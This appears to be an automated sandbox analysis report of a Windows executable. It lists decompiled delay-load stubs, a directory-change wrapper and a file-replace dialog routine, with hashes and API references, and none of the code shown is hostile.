Part of subcall function 0017DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017DFD6
Part of subcall function 0017DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017DFE7

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1d0d7cc6f7458a8e391f9343e75d5f27602b16694fdc8c5fa115ec92c7834590
Instruction ID: 38069eef659092c87a8ec2e237266f1372cd5f5000441f6f0098875ef5114f7f
Opcode Fuzzy Hash: 1d0d7cc6f7458a8e391f9343e75d5f27602b16694fdc8c5fa115ec92c7834590
Instruction Fuzzy Hash: 4DA001A62AD10ABC750C7292BE56D3A02BCD8D4B65371CA1EF40F95089AB84694A5872

Uniqueness

Uniqueness Score: -1.00%

Function 0017DACA, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0017DACA() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x19bde4); // executed
				E0017DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0017daad
0x0017dab2
0x0017dab9

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0017DAB2

Part of subcall function 0017DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017DFD6
Part of subcall function 0017DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017DFE7

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ca34a8dfeae98fb5f6f96ef3dc94cfba62e84aeb85e6b91ce0e38b2513170a78
Instruction ID: 38069eef659092c87a8ec2e237266f1372cd5f5000441f6f0098875ef5114f7f
Opcode Fuzzy Hash: ca34a8dfeae98fb5f6f96ef3dc94cfba62e84aeb85e6b91ce0e38b2513170a78
Instruction Fuzzy Hash: 4DA001A62AD10ABC750C7292BE56D3A02BCD8D4B65371CA1EF40F95089AB84694A5872

Uniqueness

Uniqueness Score: -1.00%

Function 0017DAF2, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0017DAF2() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x19bde4); // executed
				E0017DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0017daad
0x0017dab2
0x0017dab9

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0017DAB2

Part of subcall function 0017DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017DFD6
Part of subcall function 0017DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017DFE7

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3b8d5ce87ddaa8511019b67169cfabca636b96613da1efb4deb53be7d88ff294
Instruction ID: 38069eef659092c87a8ec2e237266f1372cd5f5000441f6f0098875ef5114f7f
Opcode Fuzzy Hash: 3b8d5ce87ddaa8511019b67169cfabca636b96613da1efb4deb53be7d88ff294
Instruction Fuzzy Hash: 4DA001A62AD10ABC750C7292BE56D3A02BCD8D4B65371CA1EF40F95089AB84694A5872

Uniqueness

Uniqueness Score: -1.00%

Function 0017DAFC, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0017DAFC() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x19bde4); // executed
				E0017DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0017daad
0x0017dab2
0x0017dab9

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0017DAB2

Part of subcall function 0017DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017DFD6
Part of subcall function 0017DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017DFE7

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 038d357eddd392668ef0b004f761983056cfe14909a896a1338d7733ca6c09e3
Instruction ID: 38069eef659092c87a8ec2e237266f1372cd5f5000441f6f0098875ef5114f7f
Opcode Fuzzy Hash: 038d357eddd392668ef0b004f761983056cfe14909a896a1338d7733ca6c09e3
Instruction Fuzzy Hash: 4DA001A62AD10ABC750C7292BE56D3A02BCD8D4B65371CA1EF40F95089AB84694A5872

Uniqueness

Uniqueness Score: -1.00%

Function 0017DAE8, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0017DAE8() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x19bde4); // executed
				E0017DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0017daad
0x0017dab2
0x0017dab9

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0017DAB2

Part of subcall function 0017DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017DFD6
Part of subcall function 0017DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017DFE7

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f6a2ee138fbac20f5cb3377161ebef959bdee5ec7f3c19193fd6a65d811fac9c
Instruction ID: 38069eef659092c87a8ec2e237266f1372cd5f5000441f6f0098875ef5114f7f
Opcode Fuzzy Hash: f6a2ee138fbac20f5cb3377161ebef959bdee5ec7f3c19193fd6a65d811fac9c
Instruction Fuzzy Hash: 4DA001A62AD10ABC750C7292BE56D3A02BCD8D4B65371CA1EF40F95089AB84694A5872

Uniqueness

Uniqueness Score: -1.00%

Function 0017DBF7, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0017DBF7() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x19be44); // executed
				E0017DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0017dbd0
0x0017dbd5
0x0017dbdc

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0017DBD5

Part of subcall function 0017DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017DFD6
Part of subcall function 0017DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017DFE7

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 95be18ecffefaf3445b5aac8f90e55ce4f2ff7dfac2e8fe036963416d07e5ac0
Instruction ID: 4b50509d6926d40693b87ed50db6038b5865dc4bbf7c5ab99fb5563eb413b089
Opcode Fuzzy Hash: 95be18ecffefaf3445b5aac8f90e55ce4f2ff7dfac2e8fe036963416d07e5ac0
Instruction Fuzzy Hash: 3AA011AA2AC00ABCB00C22003E0BC3A023CC8C0F203B2C80EF00F80080AB800C0A0030

Uniqueness

Uniqueness Score: -1.00%

Function 0017DC15, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0017DC15() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x19be44); // executed
				E0017DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0017dbd0
0x0017dbd5
0x0017dbdc

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0017DBD5

Part of subcall function 0017DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017DFD6
Part of subcall function 0017DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017DFE7

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e54cb6d2173129319c147971ad9b56a809e5447af4f2875de870ae79e016154d
Instruction ID: 4b50509d6926d40693b87ed50db6038b5865dc4bbf7c5ab99fb5563eb413b089
Opcode Fuzzy Hash: e54cb6d2173129319c147971ad9b56a809e5447af4f2875de870ae79e016154d
Instruction Fuzzy Hash: 3AA011AA2AC00ABCB00C22003E0BC3A023CC8C0F203B2C80EF00F80080AB800C0A0030

Uniqueness

Uniqueness Score: -1.00%

Function 0017DC1F, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0017DC1F() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x19be44); // executed
				E0017DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0017dbd0
0x0017dbd5
0x0017dbdc

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0017DBD5

Part of subcall function 0017DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017DFD6
Part of subcall function 0017DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017DFE7

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c1bee56abb2e8383f7db0384aac180073cda13b30bce5116ec2c2bbb686800f7
Instruction ID: 4b50509d6926d40693b87ed50db6038b5865dc4bbf7c5ab99fb5563eb413b089
Opcode Fuzzy Hash: c1bee56abb2e8383f7db0384aac180073cda13b30bce5116ec2c2bbb686800f7
Instruction Fuzzy Hash: 3AA011AA2AC00ABCB00C22003E0BC3A023CC8C0F203B2C80EF00F80080AB800C0A0030

Uniqueness

Uniqueness Score: -1.00%

Function 0017DC0B, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0017DC0B() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x19be44); // executed
				E0017DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0017dbd0
0x0017dbd5
0x0017dbdc

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0017DBD5

Part of subcall function 0017DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017DFD6
Part of subcall function 0017DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017DFE7

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 48178045b0daa04cc0d6a90bada42a114b881c105285c45d3e4a4ecbef8683a0
Instruction ID: 4b50509d6926d40693b87ed50db6038b5865dc4bbf7c5ab99fb5563eb413b089
Opcode Fuzzy Hash: 48178045b0daa04cc0d6a90bada42a114b881c105285c45d3e4a4ecbef8683a0
Instruction Fuzzy Hash: 3AA011AA2AC00ABCB00C22003E0BC3A023CC8C0F203B2C80EF00F80080AB800C0A0030

Uniqueness

Uniqueness Score: -1.00%

Function 0017DC44, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0017DC44() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x19be64); // executed
				E0017DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0017dc31
0x0017dc36
0x0017dc3d

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0017DC36

Part of subcall function 0017DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017DFD6
Part of subcall function 0017DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017DFE7

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a0c5bfa30ef83098da9c0dcd06faf6e497e72c5b68bc690d941a245e5734c5d3
Instruction ID: 905e32230027120bc7255e4850fd984524b18efd754dd950002cfac2aebbeb5d
Opcode Fuzzy Hash: a0c5bfa30ef83098da9c0dcd06faf6e497e72c5b68bc690d941a245e5734c5d3
Instruction Fuzzy Hash: 4FA001AA6AD20ABD750D62517E56D7A023CC8D4B61371C91EF50FA4091AB806C4A9431

Uniqueness

Uniqueness Score: -1.00%

Function 0017DC4E, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0017DC4E() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x19be64); // executed
				E0017DF59(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x0017dc31
0x0017dc36
0x0017dc3d

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0017DC36

Part of subcall function 0017DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017DFD6
Part of subcall function 0017DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017DFE7

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c1230d14c2d0e2d383f536430a34067e7693ed4f7c87f7bdf78d93ab35bc6d67
Instruction ID: 905e32230027120bc7255e4850fd984524b18efd754dd950002cfac2aebbeb5d
Opcode Fuzzy Hash: c1230d14c2d0e2d383f536430a34067e7693ed4f7c87f7bdf78d93ab35bc6d67
Instruction Fuzzy Hash: 4FA001AA6AD20ABD750D62517E56D7A023CC8D4B61371C91EF50FA4091AB806C4A9431

Uniqueness

Uniqueness Score: -1.00%

Function 0017A322, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0017A322(WCHAR* _a4) {
				signed int _t2;

				_t2 = SetCurrentDirectoryW(_a4); // executed
				asm("sbb eax, eax");
				return  ~( ~_t2);
			}

0x0017a326
0x0017a32e
0x0017a332

APIs

SetCurrentDirectoryW.KERNELBASE(?,0017A587,C:\Users\user\AppData\Roaming,00000000,001A946A,00000006), ref: 0017A326

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 2c90e5b384166e222f9bf5217a656ec3cc174ec1c554b1089dcdbc0b4d2e56cf
Instruction ID: 8aa4fb105dc0a6c010538a4dbcd6a92942e561319ecfde2e60858575dab0cb1b
Opcode Fuzzy Hash: 2c90e5b384166e222f9bf5217a656ec3cc174ec1c554b1089dcdbc0b4d2e56cf
Instruction Fuzzy Hash: 01A01230194006568A000B30CC09C1576505760702F0086327002C00B0CB308C54A500

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0017B8E0, Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286
timewindowfileCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E0017B8E0(void* __ecx, void* __edx, void* __eflags, char _a4, short _a8, char _a12, short _a108, short _a112, char _a192, char _a212, struct _WIN32_FIND_DATAW _a288, signed char _a304, signed char _a308, struct _FILETIME _a332, intOrPtr _a340, intOrPtr _a344, short _a884, short _a896, short _a900, int _a1904, char _a1924, int _a1928, short _a2596, short _a2616, char _a2628, char _a2640, struct HWND__* _a6740, intOrPtr _a6744, signed short _a6748, intOrPtr _a6752) {
				struct _FILETIME _v0;
				struct _SYSTEMTIME _v12;
				struct _SYSTEMTIME _v16;
				struct _FILETIME _v24;
				void* _t73;
				void* _t136;
				long _t137;
				void* _t141;
				void* _t142;
				void* _t143;
				void* _t144;
				void* _t145;
				signed short _t148;
				void* _t149;
				void* _t151;
				void* _t152;
				intOrPtr _t153;
				signed int _t154;
				signed int _t158;
				struct HWND__* _t160;
				intOrPtr _t163;
				void* _t164;
				int _t167;
				int _t170;
				void* _t175;
				void* _t177;

				_t157 = __edx;
				_t152 = __ecx;
				E0017E360();
				_t148 = _a6748;
				_t163 = _a6744;
				_t160 = _a6740;
				if(E0016130B(__edx, _t160, _t163, _t148, _a6752, L"REPLACEFILEDLG", 0, 0) == 0) {
					_t164 = _t163 - 0x110;
					if(_t164 == 0) {
						SetFocus(GetDlgItem(_t160, 0x6c));
						E0016FE56( &_a2640, _a6752, 0x800);
						E0016BD5B( &_a2628,  &_a2628, 0x800);
						SetDlgItemTextW(_t160, 0x65,  &_a2616);
						 *0x1c2080( &_a2616, 0,  &_a1924, 0x2b4, 0x100);
						SendDlgItemMessageW(_t160, 0x66, 0x170, _a1904, 0);
						_t149 = FindFirstFileW( &_a2596,  &_a288);
						if(_t149 != 0xffffffff) {
							FileTimeToLocalFileTime( &_a332,  &(_v24.dwHighDateTime));
							FileTimeToSystemTime( &(_v24.dwHighDateTime),  &_v12);
							_push(0x32);
							_push( &_a12);
							_push(0);
							_push( &_v12);
							_t167 = 2;
							GetTimeFormatW(0x400, 0x800, ??, ??, ??, ??);
							GetDateFormatW(0x400, 0,  &_v12, 0,  &_a112, 0x32);
							_push( &_a12);
							_push( &_a112);
							E0016400A( &_a900, 0x200, L"%s %s %s", E0016DDD1(_t152, 0x99));
							_t177 = _t175 + 0x18;
							SetDlgItemTextW(_t160, 0x6a,  &_a900);
							FindClose(_t149);
							if((_a308 & 0x00000010) != 0) {
								_t151 = 0x200;
							} else {
								asm("adc eax, ebp");
								E0017A63C(0 + _a344, _a340,  &_a212, 0x32);
								_push(E0016DDD1(0 + _a344, 0x98));
								_t151 = 0x200;
								E0016400A( &_a884, 0x200, L"%s %s",  &_a192);
								_t177 = _t177 + 0x14;
								SetDlgItemTextW(_t160, 0x68,  &_a884);
							}
							SendDlgItemMessageW(_t160, 0x67, 0x170, _a1928, 0);
							_t153 =  *0x1a8464; // 0x0
							E00170BDD(_t153, _t157,  &_a4);
							FileTimeToLocalFileTime( &_v0,  &_v24);
							FileTimeToSystemTime( &_v24,  &_v16);
							GetTimeFormatW(0x400, _t167,  &_v16, 0,  &_a8, 0x32);
							GetDateFormatW(0x400, 0,  &_v16, 0,  &_a108, 0x32);
							_push( &_a8);
							_push( &_a108);
							E0016400A( &_a896, _t151, L"%s %s %s", E0016DDD1(_t153, 0x99));
							_t175 = _t177 + 0x18;
							SetDlgItemTextW(_t160, 0x6b,  &_a896);
							_t154 =  *0x1bdc8c;
							_t158 =  *0x1bdc88;
							if((_a304 & 0x00000010) == 0 || (_t158 | _t154) != 0) {
								E0017A63C(_t158, _t154,  &_a212, 0x32);
								_push(E0016DDD1(_t154, 0x98));
								E0016400A( &_a884, _t151, L"%s %s",  &_a192);
								_t175 = _t175 + 0x14;
								SetDlgItemTextW(_t160, 0x69,  &_a884);
							}
						}
						L27:
						_t73 = 0;
						L28:
						return _t73;
					}
					if(_t164 != 1) {
						goto L27;
					}
					_t170 = 2;
					_t136 = (_t148 & 0x0000ffff) - _t170;
					if(_t136 == 0) {
						L11:
						_push(6);
						L12:
						_pop(_t170);
						L13:
						_t137 = SendDlgItemMessageW(_t160, 0x66, 0x171, 0, 0);
						if(_t137 != 0) {
							 *0x1c20d4(_t137);
						}
						EndDialog(_t160, _t170);
						goto L1;
					}
					_t141 = _t136 - 0x6a;
					if(_t141 == 0) {
						_t170 = 0;
						goto L13;
					}
					_t142 = _t141 - 1;
					if(_t142 == 0) {
						_t170 = 1;
						goto L13;
					}
					_t143 = _t142 - 1;
					if(_t143 == 0) {
						_push(4);
						goto L12;
					}
					_t144 = _t143 - 1;
					if(_t144 == 0) {
						goto L13;
					}
					_t145 = _t144 - 1;
					if(_t145 == 0) {
						_push(3);
						goto L12;
					}
					if(_t145 != 1) {
						goto L27;
					}
					goto L11;
				}
				L1:
				_t73 = 1;
				goto L28;
			}

0x0017b8e0
0x0017b8e0
0x0017b8e5
0x0017b8eb
0x0017b8f4
0x0017b8fe
0x0017b91d
0x0017b927
0x0017b92d
0x0017b9a7
0x0017b9c2
0x0017b9d1
0x0017b9e1
0x0017ba02
0x0017ba18
0x0017ba34
0x0017ba39
0x0017ba4c
0x0017ba5c
0x0017ba62
0x0017ba68
0x0017ba69
0x0017ba6e
0x0017ba71
0x0017ba78
0x0017ba94
0x0017ba9e
0x0017baa6
0x0017bac4
0x0017bac9
0x0017bad7
0x0017bade
0x0017baec
0x0017bb52
0x0017baee
0x0017bb08
0x0017bb0c
0x0017bb1b
0x0017bb23
0x0017bb37
0x0017bb3c
0x0017bb4a
0x0017bb4a
0x0017bb67
0x0017bb6d
0x0017bb78
0x0017bb87
0x0017bb97
0x0017bbb1
0x0017bbc9
0x0017bbd3
0x0017bbdb
0x0017bbf5
0x0017bbfa
0x0017bc08
0x0017bc16
0x0017bc1c
0x0017bc22
0x0017bc36
0x0017bc45
0x0017bc5c
0x0017bc61
0x0017bc6f
0x0017bc6f
0x0017bc22
0x0017bc75
0x0017bc75
0x0017bc77
0x0017bc81
0x0017bc81
0x0017b932
0x00000000
0x00000000
0x0017b93d
0x0017b93e
0x0017b940
0x0017b964
0x0017b964
0x0017b966
0x0017b966
0x0017b967
0x0017b971
0x0017b979
0x0017b97c
0x0017b97c
0x0017b984
0x00000000
0x0017b984
0x0017b942
0x0017b945
0x0017b999
0x00000000
0x0017b999
0x0017b947
0x0017b94a
0x0017b996
0x00000000
0x0017b996
0x0017b94c
0x0017b94f
0x0017b990
0x00000000
0x0017b990
0x0017b951
0x0017b954
0x00000000
0x00000000
0x0017b956
0x0017b959
0x0017b98c
0x00000000
0x0017b98c
0x0017b95e
0x00000000
0x00000000
0x00000000
0x0017b95e
0x0017b91f
0x0017b921
0x00000000

APIs

Part of subcall function 0016130B: GetDlgItem.USER32(00000000,00003021), ref: 0016134F
Part of subcall function 0016130B: SetWindowTextW.USER32(00000000,001935B4), ref: 00161365

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0017B971
EndDialog.USER32(?,00000006), ref: 0017B984
GetDlgItem.USER32(?,0000006C), ref: 0017B9A0
SetFocus.USER32(00000000), ref: 0017B9A7
SetDlgItemTextW.USER32(?,00000065,?), ref: 0017B9E1
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0017BA18
FindFirstFileW.KERNEL32(?,?), ref: 0017BA2E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0017BA4C
FileTimeToSystemTime.KERNEL32(?,?), ref: 0017BA5C
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0017BA78
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0017BA94
_swprintf.LIBCMT ref: 0017BAC4

Part of subcall function 0016400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0016401D

